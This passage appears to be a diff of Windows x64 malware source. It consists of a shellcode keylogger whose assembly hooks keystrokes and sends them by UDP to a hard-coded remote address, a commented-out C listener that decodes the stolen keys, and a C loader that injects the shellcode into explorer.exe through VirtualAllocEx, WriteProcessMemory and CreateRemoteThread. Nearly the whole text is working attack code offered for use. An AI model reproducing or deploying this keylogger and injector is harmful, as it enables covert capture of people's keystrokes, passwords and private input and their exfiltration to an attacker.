0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3 + +;------------------------------------------------------------------------------------------------------------------- +_proceed_: + +sub rsp,88 +push r8 +push rdx +push rcx + + + + +;--------------------------------------------- +xor rsi,rsi +mov rax,'HEREITIS' +find: + + +mov r10,[rsp+rsi] +inc rsi +cmp r10,rax +jne find + +add rsi,7 +lea rbx,[rsp+rsi] +mov rdi,[rbx] +mov r12,[rbx+8] +mov r15,[rbx+16] + + +;------------------------------------------------ +test rcx,rcx +jnz short _out_ + +xor rbx,rbx +mov bl,1 +shl rbx,8 + +cmp rdx,rbx +jne short _out_ + + +;-------------------------------------------------------- + +mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL) +xor rcx,rcx +mov cl,0x14 +call rbx + +mov [r12],ax + +mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT) +xor rcx,rcx +mov cl,0x10 +call rbx + +mov [r12+2],ax + + + + +;------------------------------- +;sending keystrokes +mov rbx,[rsp+16] +mov eax,[rbx] +mov [r12+4],eax ;Virtual key code + +sub rsp,88 +mov rcx,[rdi+8] ;SOCKET +push r12 +pop rdx + +xor r9,r9 +push r9 + +pop r8 +mov r8b,16 +mov 
[rsp+32],r15 +mov [rsp+40],r8 +sub r8,8 + +mov rbx,[rdi+80] +call rbx +add rsp,88 + + +;----------------------------------------------------------- + +_out_: + +pop rdx +pop r8 +pop r9 + + +mov rbx,[rdi+24] + +xor rcx,rcx + +call rbx + + +add rsp,88 + + +ret + + + + + + +*/ + + +/* + +//keylogger Handler + +#include +#include +#include + +#pragma pack(1) + +typedef struct key +{ + short caps; + short shift; + DWORD vkcode; +}KEYDATA; + + +char * Determine(BOOL caps,BOOL shift,DWORD code) +{ + char * key; + switch (code) // SWITCH ON INT + { + case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break; + case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break; + case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break; + case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break; + case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break; + case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break; + case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break; + case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break; + case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break; + case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break; + case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break; + case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break; + case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break; + case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break; + case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break; + case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break; + case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break; + case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break; + case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? 
"S" : "s"); break;
+ case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break;
+ case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break;
+ case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break;
+ case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break;
+ case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break;
+ case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break;
+ case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break;
+ // Sleep Key
+ case VK_SLEEP: key = "[SLEEP]"; break;
+ // Num Keyboard
+ case VK_NUMPAD0: key = "0"; break;
+ case VK_NUMPAD1: key = "1"; break;
+ case VK_NUMPAD2 : key = "2"; break;
+ case VK_NUMPAD3: key = "3"; break;
+ case VK_NUMPAD4: key = "4"; break;
+ case VK_NUMPAD5: key = "5"; break;
+ case VK_NUMPAD6: key = "6"; break;
+ case VK_NUMPAD7: key = "7"; break;
+ case VK_NUMPAD8: key = "8"; break;
+ case VK_NUMPAD9: key = "9"; break;
+ case VK_MULTIPLY: key = "*"; break;
+ case VK_ADD: key = "+"; break;
+ case VK_SEPARATOR: key = "-"; break;
+ case VK_SUBTRACT: key = "-"; break;
+ case VK_DECIMAL: key = "."; break;
+ case VK_DIVIDE: key = "/"; break;
+ // Function Keys
+ case VK_F1: key = "[F1]"; break;
+ case VK_F2: key = "[F2]"; break;
+ case VK_F3: key = "[F3]"; break;
+ case VK_F4: key = "[F4]"; break;
+ case VK_F5: key = "[F5]"; break;
+ case VK_F6: key = "[F6]"; break;
+ case VK_F7: key = "[F7]"; break;
+ case VK_F8: key = "[F8]"; break;
+ case VK_F9: key = "[F9]"; break;
+ case VK_F10: key = "[F10]"; break;
+ case VK_F11: key = "[F11]"; break;
+ case VK_F12: key = "[F12]"; break;
+ case VK_F13: key = "[F13]"; break;
+ case VK_F14: key = "[F14]"; break;
+ case VK_F15: key = "[F15]"; break;
+ case VK_F16: key = "[F16]"; break;
+ case VK_F17: key = "[F17]"; break;
+ case VK_F18: key = "[F18]"; break;
+ case VK_F19: key = "[F19]"; break;
+ case VK_F20: key = "[F20]"; break;
+ case VK_F21: key = "[F22]"; break;
+
 case VK_F22: key = "[F23]"; break;
+ case VK_F23: key = "[F24]"; break;
+ case VK_F24: key = "[F25]"; break;
+ // Keys
+ case VK_NUMLOCK: key = "[NUM-LOCK]"; break;
+ case VK_SCROLL: key = "[SCROLL-LOCK]"; break;
+ case VK_BACK: key = "[BACK]"; break;
+ case VK_TAB: key = "[TAB]"; break;
+ case VK_CLEAR: key = "[CLEAR]"; break;
+ case VK_RETURN: key = "[ENTER]"; break;
+ case VK_SHIFT: key = "[SHIFT]"; break;
+ case VK_CONTROL: key = "[CTRL]"; break;
+ case VK_MENU: key = "[ALT]"; break;
+ case VK_PAUSE: key = "[PAUSE]"; break;
+ case VK_CAPITAL: key = "[CAP-LOCK]"; break;
+ case VK_ESCAPE: key = "[ESC]"; break;
+ case VK_SPACE: key = "[SPACE]"; break;
+ case VK_PRIOR: key = "[PAGEUP]"; break;
+ case VK_NEXT: key = "[PAGEDOWN]"; break;
+ case VK_END: key = "[END]"; break;
+ case VK_HOME: key = "[HOME]"; break;
+ case VK_LEFT: key = "[LEFT]"; break;
+ case VK_UP: key = "[UP]"; break;
+ case VK_RIGHT: key = "[RIGHT]"; break;
+ case VK_DOWN: key = "[DOWN]"; break;
+ case VK_SELECT: key = "[SELECT]"; break;
+ case VK_PRINT: key = "[PRINT]"; break;
+ case VK_SNAPSHOT: key = "[PRTSCRN]"; break;
+ case VK_INSERT: key = "[INS]"; break;
+ case VK_DELETE: key = "[DEL]"; break;
+ case VK_HELP: key = "[HELP]"; break;
+ // Number Keys with shift
+ case 0x30: key = shift ? ")" : "0"; break;
+ case 0x31: key = shift ? "!" : "1"; break;
+ case 0x32: key = shift ? "@" : "2"; break;
+ case 0x33: key = shift ? "#" : "3"; break;
+ case 0x34: key = shift ? "$" : "4"; break;
+ case 0x35: key = shift ? "%" : "5"; break;
+ case 0x36: key = shift ? "^" : "6"; break;
+ case 0x37: key = shift ? "&" : "7"; break;
+ case 0x38: key = shift ? "*" : "8"; break;
+ case 0x39: key = shift ? 
"(" : "9"; break;
+ // Windows Keys
+ case VK_LWIN: key = "[WIN]"; break;
+ case VK_RWIN: key = "[WIN]"; break;
+ case VK_LSHIFT: key = "[SHIFT]"; break;
+ case VK_RSHIFT: key = "[SHIFT]"; break;
+ case VK_LCONTROL: key = "[CTRL]"; break;
+ case VK_RCONTROL: key = "[CTRL]"; break;
+ // OEM Keys with shift
+ case VK_OEM_1: key = shift ? ":" : ";"; break;
+ case VK_OEM_PLUS: key = shift ? "+" : "="; break;
+ case VK_OEM_COMMA: key = shift ? "<" : ","; break;
+ case VK_OEM_MINUS: key = shift ? "_" : "-"; break;
+ case VK_OEM_PERIOD: key = shift ? ">" : "."; break;
+ case VK_OEM_2: key = shift ? "?" : "/"; break;
+ case VK_OEM_3: key = shift ? "~" : "`"; break;
+ case VK_OEM_4: key = shift ? "{" : "["; break;
+ case VK_OEM_5: key = shift ? "|" : "\\"; break;
+ case VK_OEM_6: key = shift ? "}" : "]"; break;
+ case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: "
+ // Action Keys
+ case VK_PLAY: key = "[PLAY]";break;
+ case VK_ZOOM: key = "[ZOOM]";break;
+ case VK_OEM_CLEAR: key = "[CLEAR]";break;
+ case VK_CANCEL: key = "[CTRL-C]";break;
+
+ default: key = "[UNK-KEY]";break;
+ }
+ return key;
+}
+
+
+
+int main()
+{
+ int port;
+ SOCKET s;
+ struct sockaddr_in sr,cr;
+ WSADATA wsa;
+ KEYDATA keystrk;
+ char * n;
+
+ printf("Enter Port Number To Listen: ");
+ scanf("%d",&port);
+
+ if(WSAStartup(514,&wsa))
+ {
+ printf("WSAStartup() Failed");
+ return 0;
+ }
+
+ if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
+ {
+ printf("Failed To Create Socket...");
+ return 0;
+ }
+
+ ZeroMemory(&sr,16);
+ sr.sin_family=AF_INET;
+ sr.sin_port=htons(port);
+
+ if(bind(s,(struct sockaddr *)&sr,16))
+ {
+ printf("Failed To Bind..");
+ return 0;
+ }
+
+ port=16; //Why bother to declare a variable for int * fromlen
+ while(1)
+ {
+ recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);
+ n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);
+ printf("%s",n);
+ }
+ return 0;
+}
+
+
+
+*/
+
+
+#include
+#include
+#include
+#include
+
+char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x4c\x01\xea\x48\x8b\x5f\x10\xff\xd3\x49\x8d\x4c\x24\x08\x48\x31\xd2\x52\x52\x41\x58\x41\x59\x48\x8b\x5f\x28\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x30\xff\xd3\x49\x8d\x4c\x24\x08\x48\x8b\x5f\x38\xff\xd3\xeb\xd4\x47\x65\x74\x4d\x6f\x64\x75\x6c\x65\x48\x61\x6e\x64\x6c\x65\x41\x01\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x01\x53\x65\x74\x57\x69\x6e\x64\x6f\x77\x73\x48\x6f\x6f\x6b\x45\x78\x41\x01\x43\x61\x6c\x6c\x4e\x65\x78\x74\x48\x6f\x6f\x6b\x45\x78\x01\x47\x65\x74\x4b\x65\x79\x53\x74\x61\x74\x65\x01\x47\x65\x74\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x54\x72\x61\x6e\x73\x6c\x61\x74\x65\x4d\x65\x73\x73\x61\x67\x65\x01\x44\x69\x73\x70\x61\x74\x63\x68\x4d\x65\x73\x73\x61\x67\x65\x41\x01\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x01\x73\x6f\x63\x6b\x65\x74\x01\x73\x65\x6e\x64\x74\x6f\
x01\x56\x57\x41\x50\x52\x41\x51\x51\x41\x5b\x48\x31\xdb\x53\x53\x5a\x58\x8b\x59\x3c\x48\x01\xcb\xb2\x88\x8b\x04\x13\x48\x01\xc8\x48\x31\xd2\x52\x52\x52\x41\x58\x41\x59\x41\x5a\x44\x8b\x40\x20\x4d\x01\xd8\x44\x8b\x48\x24\x4d\x01\xd9\x44\x8b\x50\x1c\x4d\x01\xda\x48\x31\xd2\x48\x31\xf6\x56\x59\x41\x8b\x34\x90\x4c\x01\xde\x48\x8b\x7c\x24\x08\x48\x31\xc0\x8a\x04\x0f\x48\xff\xc1\x3c\x01\x75\xf6\x48\xff\xc2\x51\x48\xff\xc9\x48\x87\xf7\xf3\xa6\x59\x75\xd3\x48\xff\xca\x48\x8b\x7c\x24\x08\x48\x01\xcf\x48\x89\x7c\x24\x08\x48\x31\xdb\x53\x58\x66\x41\x8b\x1c\x51\x41\x8b\x04\x9a\x4c\x01\xd8\x48\x8b\x1c\x24\x48\x89\x03\x48\x83\xc3\x08\x48\x89\x1c\x24\x48\x8b\x5c\x24\x10\x48\xff\xcb\x48\x89\x5c\x24\x10\x48\x31\xd2\x48\x39\xd3\x75\x8e\x48\x83\xc4\x18\x5f\x5e\xc3\x48\x83\xec\x58\x41\x50\x52\x51\x48\x31\xf6\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x4c\x8b\x14\x34\x48\xff\xc6\x49\x39\xc2\x75\xf4\x48\x83\xc6\x07\x48\x8d\x1c\x34\x48\x8b\x3b\x4c\x8b\x63\x08\x4c\x8b\x7b\x10\x48\x85\xc9\x75\x68\x48\x31\xdb\xb3\x01\x48\xc1\xe3\x08\x48\x39\xda\x75\x5a\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x14\xff\xd3\x66\x41\x89\x04\x24\x48\x8b\x5f\x20\x48\x31\xc9\xb1\x10\xff\xd3\x66\x41\x89\x44\x24\x02\x48\x8b\x5c\x24\x10\x8b\x03\x41\x89\x44\x24\x04\x48\x83\xec\x58\x48\x8b\x4f\x08\x41\x54\x5a\x4d\x31\xc9\x41\x51\x41\x58\x41\xb0\x10\x4c\x89\x7c\x24\x20\x4c\x89\x44\x24\x28\x49\x83\xe8\x08\x48\x8b\x5f\x50\xff\xd3\x48\x83\xc4\x58\x5a\x41\x58\x41\x59\x48\x8b\x5f\x18\x48\x31\xc9\xff\xd3\x48\x83\xc4\x58\xc3"; + + + +int main() +{ + HANDLE s,proc; + PROCESSENTRY32 ps; + BOOL process_found=0; + LPVOID shell; + SIZE_T total; + + //finding explorer.exe pid + + ps.dwSize=sizeof(ps); + + s=CreateToolhelp32Snapshot(2,0); + + if(s==INVALID_HANDLE_VALUE) + { + printf("CreateToolhelp32Snapshot() failed.Error code %d\n",GetLastError()); + return -1; + } + + if(!Process32First(s,&ps)) + { + printf("Process32First() failed.Error code %d\n",GetLastError()); + return -1; + } + + + do{ + if(0==strcmp(ps.szExeFile,"explorer.exe")) + { + 
 process_found=1;
+ break;
+ }
+ }while(Process32Next(s,&ps));
+
+
+ if(!process_found)
+ {
+ printf("Unknown Process\n");
+ return -1;
+ }
+
+
+ //opening process using pid
+
+
+ proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);
+
+ if(proc==INVALID_HANDLE_VALUE)
+ {
+ printf("OpenProcess() failed.Error code %d\n",GetLastError());
+ return -1;
+ }
+
+
+ //allocating memory process memory
+
+ if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)
+ {
+ printf("Failed to allocate memory into process");
+ CloseHandle(proc);
+ return -1;
+ }
+
+
+ //writing shellcode into process memory
+
+ WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);
+
+ if(sizeof(shellcode)!=total)
+ {
+ printf("Failed write shellcode into process memory");
+ CloseHandle(proc);
+ return -1;
+ }
+
+
+ //Executing shellcode
+
+ if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)
+ {
+ printf("Failed to Execute shellcode");
+ CloseHandle(proc);
+ return -1;
+ }
+
+ CloseHandle(proc);
+ CloseHandle(s);
+
+ return 0;
+
+
+}
\ No newline at end of file